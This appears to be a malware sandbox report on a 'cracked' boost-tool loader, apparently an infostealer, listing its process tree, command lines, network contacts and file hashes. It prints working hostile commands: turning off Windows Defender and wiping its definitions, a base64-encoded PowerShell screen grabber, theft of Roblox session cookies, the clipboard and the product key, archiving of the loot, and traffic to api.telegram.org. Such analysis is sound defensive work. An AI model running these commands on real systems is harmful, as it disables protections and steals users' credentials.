PID 1404 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4672 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\servicing\TrustedInstaller.exe
PID 4672 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\servicing\TrustedInstaller.exe
PID 1404 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1740 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4200,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4036 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe

bound.exe

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkksongd\nkksongd.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2093.tmp" "c:\Users\Admin\AppData\Local\Temp\nkksongd\CSCE42061967AF0434EBFA9CAAE41F44C73.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1368"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1368

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1956

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5072

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 556"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 556

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4884"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4884

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1580"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1580

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\AxPxY.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\AxPxY.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 blank-jltvu.in udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31002\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI31002\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/1404-26-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

